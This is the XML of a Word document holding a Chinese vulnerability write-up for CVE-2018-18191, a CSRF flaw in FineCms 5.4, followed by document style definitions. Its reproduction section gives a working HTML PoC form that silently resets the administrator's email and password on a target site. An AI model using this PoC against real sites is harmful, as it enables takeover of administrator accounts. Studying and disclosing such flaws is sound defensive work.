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Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="cve-2018-18191finecms-54-存在csrf漏洞"/>
      <w:r>
        <w:t xml:space="preserve">（CVE-2018-18191）Finecms 5.4 存在CSRF漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="一漏洞简介"/>
      <w:r>
        <w:t xml:space="preserve">一、漏洞简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dayrui FineCms是中国天睿（Dayrui）程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统（CMS）。 Dayrui FineCms 5.4版本中的/admin.php?c=member&amp;m=edit&amp;uid=1存在跨站请求伪造漏洞。远程攻击者可利用该漏洞修改管理员账户密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="二漏洞影响"/>
      <w:r>
        <w:t xml:space="preserve">二、漏洞影响</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finecms 5.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="三复现过程"/>
      <w:r>
        <w:t xml:space="preserve">三、复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="poc"/>
      <w:r>
        <w:t xml:space="preserve">poc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;form action="http://www.0-sec.org/admin.php?c=member&amp;m=edit&amp;uid=1" method="POST"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="page" value="0" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="member&amp;#91;email&amp;#93;" value="admin&amp;#64;163&amp;#46;com" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="member&amp;#91;name&amp;#93;" value="admin" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="member&amp;#91;phone&amp;#93;" value="18888888888" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="member&amp;#91;password&amp;#93;" value="888888" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/html&gt;</w:t>
      </w:r>
    </w:p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</w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:pPr>
      <w:spacing w:before="180" w:after="180"/>
    </w:pPr>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="BodyText"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Compact">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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ubtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Title"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
    <w:name w:val="Author"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Date">
    <w:name w:val="Date"/>
    <w:next w:val="BodyText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BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="300" w:after="300"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Bibliography"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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i/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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  <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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7">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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8">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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Heading9">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText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  <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BlockText">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="BodyText"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:after="100"/>
      <w:ind w:firstLine="0" w:left="480" w:right="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="Footnote Text"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="FootnoteText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:basedOn w:val="TableNormal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Caption">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableCaption">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="Caption"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImageCaption">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="Caption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BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimChar">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="Footnote Reference"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:rPr>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading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
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2020-09-08T07:53:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-08T07:53:54Z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